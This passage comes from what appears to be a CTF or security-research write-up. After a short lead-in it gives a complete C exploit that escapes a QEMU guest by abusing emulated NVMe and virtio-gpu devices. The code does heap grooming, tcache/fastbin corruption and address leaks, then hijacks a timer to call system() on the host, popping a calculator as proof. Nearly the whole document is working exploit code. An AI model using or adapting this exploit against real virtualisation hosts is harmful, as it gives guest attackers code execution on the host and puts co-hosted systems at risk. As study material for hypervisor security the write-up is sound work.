Only after reading qemu_iovec_init carefully did I understand where the problem was. With the parameters set correctly none of that hassle is needed. Of course, the 0x40 tcache must also hold 7 entries at the end; if it falls short, free some SQs or CQs so that the forged chunk goes into the fastbin when freed.

Full exploit:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <unistd.h>

void *mmio_nvme;
void *mmio_gpu;
void *buf;
void *nvme_buf;
void *desc_buf;
size_t *payload_buf;
struct VRingDesc *desc;
struct VRingAvail *avail;
struct NvmeCmd *nvme_cmd;
int sq_tail = 0;
int vq_last_avail_idx = 0;
char exec_cmd[0x40] = "gnome-calculator";

typedef struct NvmeCmd {
uint8_t opcode;
uint8_t fuse;
uint16_t cid;
uint32_t nsid;
uint64_t res1;
uint64_t mptr;
uint64_t prp1;
uint64_t prp2;
uint32_t cdw10;
uint32_t cdw11;
uint32_t cdw12;
uint32_t cdw13;
uint32_t cdw14;
uint32_t cdw15;
} NvmeCmd;

typedef struct NvmeCreateCq {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[5];
uint64_t prp1;
uint64_t rsvd8;
uint16_t cqid;
uint16_t qsize;
uint16_t cq_flags;
uint16_t irq_vector;
uint32_t rsvd12[4];
} NvmeCreateCq;

typedef struct NvmeCreateSq {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[5];
uint64_t prp1;
uint64_t rsvd8;
uint16_t sqid;
uint16_t qsize;
uint16_t sq_flags;
uint16_t cqid;
uint32_t rsvd12[4];
} NvmeCreateSq;

typedef struct NvmeRwCmd {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t nsid;
uint64_t rsvd2;
uint64_t mptr;
uint64_t prp1;
uint64_t prp2;
uint64_t slba;
uint16_t nlb;
uint16_t control;
uint32_t dsmgmt;
uint32_t reftag;
uint16_t apptag;
uint16_t appmask;
} NvmeRwCmd;

typedef struct NvmeDeleteQ {
uint8_t opcode;
uint8_t flags;
uint16_t cid;
uint32_t rsvd1[9];
uint16_t qid;
uint16_t rsvd10;
uint32_t rsvd11[5];
} NvmeDeleteQ;

typedef struct VRingAvail
{
uint16_t flags;
uint16_t idx;
uint16_t ring[];
}VRingAvail;

typedef struct VRingDesc
{
uint64_t addr;
uint32_t len;
uint16_t flags;
uint16_t next;
} VRingDesc;

struct virtio_gpu_ctrl_hdr {
uint32_t type;
uint32_t flags;
uint64_t fence_id;
uint32_t ctx_id;
uint32_t padding;
};

struct virtio_gpu_resource_attach_backing {
struct virtio_gpu_ctrl_hdr hdr;
uint32_t resource_id;
uint32_t nr_entries;
};

struct virtio_gpu_resource_create_2d {
struct virtio_gpu_ctrl_hdr hdr;
uint32_t resource_id;
uint32_t format;
uint32_t width;
uint32_t height;
};

struct virtio_gpu_mem_entry {
uint64_t addr;
uint32_t length;
uint32_t padding;
};

enum NvmeAdminCommands {
NVME_ADM_CMD_DELETE_SQ = 0x00,
NVME_ADM_CMD_CREATE_SQ = 0x01,
NVME_ADM_CMD_GET_LOG_PAGE = 0x02,
NVME_ADM_CMD_DELETE_CQ = 0x04,
NVME_ADM_CMD_CREATE_CQ = 0x05,
NVME_ADM_CMD_IDENTIFY = 0x06,
NVME_ADM_CMD_ABORT = 0x08,
NVME_ADM_CMD_SET_FEATURES = 0x09,
NVME_ADM_CMD_GET_FEATURES = 0x0a,
NVME_ADM_CMD_ASYNC_EV_REQ = 0x0c,
NVME_ADM_CMD_ACTIVATE_FW = 0x10,
NVME_ADM_CMD_DOWNLOAD_FW = 0x11,
NVME_ADM_CMD_FORMAT_NVM = 0x80,
NVME_ADM_CMD_SECURITY_SEND = 0x81,
NVME_ADM_CMD_SECURITY_RECV = 0x82,
};

enum NvmeIoCommands {
NVME_CMD_FLUSH = 0x00,
NVME_CMD_WRITE = 0x01,
NVME_CMD_READ = 0x02,
NVME_CMD_WRITE_UNCOR = 0x04,
NVME_CMD_COMPARE = 0x05,
NVME_CMD_WRITE_ZEROS = 0x08,
NVME_CMD_DSM = 0x09,
};

#define VIRTIO_PCI_COMMON_STATUS 20
#define VIRTIO_PCI_COMMON_Q_SELECT 22
#define VIRTIO_PCI_COMMON_Q_SIZE 24
#define VIRTIO_PCI_COMMON_Q_ENABLE 28
#define VIRTIO_PCI_COMMON_Q_DESCLO 32
#define VIRTIO_PCI_COMMON_Q_DESCHI 36
#define VIRTIO_PCI_COMMON_Q_AVAILLO 40
#define VIRTIO_PCI_COMMON_Q_AVAILHI 44

#define VRING_DESC_F_NEXT 1

#define VIRTIO_GPU_CMD_RESOURCE_CREATE_2D 0x101
#define VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING 0x106

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

uint32_t page_offset(uint32_t addr)
{
// addr & 0xfff
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
int fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;

gfn = pme & PFN_PFN;
close(fd);
return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_nvme_write(uint64_t addr, uint32_t val){
*(uint32_t*)(mmio_nvme + addr) = val;
}

void mmio_gpu_write(uint64_t addr, uint32_t val){
*(uint32_t*)(mmio_gpu + addr) = val;
}

void init_nvme() {
mmio_nvme_write(0x14, 0); // nvme_clear_ctrl
mmio_nvme_write(0x24, 0xff00ff); // n->bar.aqa
mmio_nvme_write(0x28, gva_to_gpa(nvme_cmd));
mmio_nvme_write(0x2c, gva_to_gpa(nvme_cmd) >> 32);

uint32_t data = 1;
data |= 6 << 16; // sqes
data |= 4 << 20; // cqes
mmio_nvme_write(0x14, data); // nvme_start_ctrl
}

void nvme_inc_sq_head(){
sq_tail = sq_tail + 1;
}


void nvme_create_cq(int cqid){
nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_CREATE_CQ;
nvme_cmd[sq_tail].prp1 = gva_to_gpa(nvme_buf);

NvmeCreateCq *nvme_create = (NvmeCreateCq *)(nvme_cmd + sq_tail);
nvme_create->cqid = cqid;
nvme_create->irq_vector = 1;
nvme_create->cq_flags = 1;
nvme_create->qsize = 1;
nvme_inc_sq_head();
}

void nvme_create_sq(int sqid, int qsize){

nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_CREATE_SQ;
nvme_cmd[sq_tail].prp1 = gva_to_gpa(nvme_buf);

NvmeCreateSq *nvme_create = (NvmeCreateSq *)(nvme_cmd + sq_tail);
nvme_create->cqid = 1;
nvme_create->sqid = sqid;
nvme_create->sq_flags = 1;
nvme_create->qsize = qsize;
nvme_inc_sq_head();
}

void nvme_del_sq(int sqid){
nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_DELETE_SQ;
NvmeCreateSq *nvme_del = (NvmeCreateSq *)(nvme_cmd + sq_tail);
nvme_del->sqid = sqid;
nvme_inc_sq_head();
mmio_nvme_write(0x1000, sq_tail);
usleep(500000); /* sleep(0.5) would truncate to sleep(0) */
}

void vuln(int sqid){
memset(nvme_buf, 0, sizeof(struct NvmeCmd));
nvme_cmd[0].opcode = NVME_CMD_READ;
nvme_cmd[0].prp1 = 0xfe000000 + 0xc00;
nvme_cmd[0].nsid = 1;
NvmeRwCmd *rwcmd = (NvmeRwCmd *)(nvme_cmd);
rwcmd->nlb = 7;
rwcmd->slba = 1;
mmio_nvme_write(0x1000 + sqid * 8, 1);
}

void init_gpu(){
mmio_gpu_write(VIRTIO_PCI_COMMON_STATUS, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_SELECT, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_SIZE, 0x100);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_DESCLO, gva_to_gpa(desc));
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_DESCHI, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_AVAILLO, gva_to_gpa(avail));
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_AVAILHI, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_ENABLE, 0);
}

void set_mapping_table(){
avail->idx = 2;
avail->ring[vq_last_avail_idx ++] = 0;
avail->ring[vq_last_avail_idx ++] = 1;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 1;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING;
ab->resource_id = 1;
ab->nr_entries = 20;

struct virtio_gpu_mem_entry *ents = buf + 0x300;
ents[0].addr = gva_to_gpa(payload_buf + 2);
ents[0].length = 0x100;
ents[1].addr = 0;
ents[1].length = 0;

desc[0].flags = 0;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);

desc[1].flags = VRING_DESC_F_NEXT;
desc[1].addr = gva_to_gpa(ab);
desc[1].len = sizeof(struct virtio_gpu_resource_attach_backing);
desc[1].next = 2;
for(int i = 2; i < 20; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(ents);
desc[i].len = sizeof(struct virtio_gpu_mem_entry);
desc[i].next = i + 1;
}
desc[7].addr = gva_to_gpa(ents + 1);
desc[20].flags = 0;
desc[20].addr = gva_to_gpa(buf + 0x40);
desc[20].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

void set_mapping_table1(){
avail->idx = 3;
avail->ring[vq_last_avail_idx ++] = 0;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 2;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING;
ab->resource_id = 2;
ab->nr_entries = 20;

desc[0].flags = VRING_DESC_F_NEXT;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);
desc[0].next = 1;
for(int i = 1; i < 21; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(exec_cmd);
desc[i].len = 0x20;
desc[i].next = i + 1;
}

desc[21].flags = 0;
desc[21].addr = gva_to_gpa(exec_cmd);
desc[21].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

void set_mapping_table2(){
avail->idx = 5;
avail->ring[vq_last_avail_idx ++] = 0;
avail->ring[vq_last_avail_idx ++] = 1;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 3;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING;
ab->resource_id = 3;
ab->nr_entries = 20;

struct virtio_gpu_mem_entry *ents = buf + 0x300;
ents[0].addr = gva_to_gpa(payload_buf + 2);
ents[0].length = 0x100;
ents[1].addr = 0;
ents[1].length = 0;

desc[0].flags = 0;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);

desc[1].flags = VRING_DESC_F_NEXT;
desc[1].addr = gva_to_gpa(ab);
desc[1].len = sizeof(struct virtio_gpu_resource_attach_backing);
desc[1].next = 2;
for(int i = 2; i < 20; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(ents);
desc[i].len = sizeof(struct virtio_gpu_mem_entry);
desc[i].next = i + 1;
}
desc[7].addr = gva_to_gpa(ents + 1);
desc[20].flags = 0;
desc[20].addr = gva_to_gpa(buf + 0x40);
desc[20].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

int main(){
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
mmio_nvme = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
int mmio_fd1 = open("/sys/devices/pci0000:00/0000:00:05.0/resource4", O_RDWR | O_SYNC);
mmio_gpu = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd1, 0);

buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(buf, 0, 0x1000);
avail = buf;
payload_buf = buf + 0x400;

desc_buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(desc_buf, 0, 0x1000);
desc = desc_buf;

nvme_buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(nvme_buf, 0, 0x1000);
nvme_cmd = nvme_buf;

puts("[*] STEP 1 heap spray");
init_nvme();
sleep(1);
for(int i = 1; i < 0x28; ++i){
nvme_create_cq(i);
}
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 2 set mapping table for free");
init_gpu();
set_mapping_table();
sleep(1);
//locally the 0x150 tcache starts with only 4 entries, and ents also enters it after g_free(ents), so one extra sq is needed
nvme_create_sq(1, 1);
nvme_create_sq(2, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 3 free the vuln_addr");
payload_buf[1] = 0x291;
payload_buf[0x53] = 0x21;
vuln(2);
sleep(1);
size_t leak_heap_addr = payload_buf[2];
printf("[*] leak_heap_addr_is %#lx\n", leak_heap_addr);

puts("[*] STEP 4 leak host's physmap addr in qemu");
set_mapping_table1();
sleep(1);
size_t physmap_addr = payload_buf[0x28];
size_t physmap_base = physmap_addr - gva_to_gpa(exec_cmd);
printf("[*] leak_host_physmap_addr_is %#lx\n", physmap_addr);
sleep(1);

puts("[*] STEP 5 free vuln_addr");
payload_buf = buf + 0x800;
set_mapping_table2();
nvme_create_sq(3, 1);
nvme_create_sq(4, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);
payload_buf[1] = 0x41;
payload_buf[9] = 0x21;
vuln(4);
sleep(1);
nvme_create_sq(5, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 6 leak qemu addr and hijack timer");
size_t elf_addr = payload_buf[4];
size_t elf_base = elf_addr - 0x517c76;
size_t system_plt = elf_base + 0x2bc790;
printf("[*] leak_elf_addr_is %#lx\n", elf_addr);
payload_buf[4] = system_plt;
payload_buf[5] = physmap_addr;
puts("[*] start escape");
mmio_nvme_write(0x1000 + 5 * 8, 1);
}

And finally, a calculator pops up.

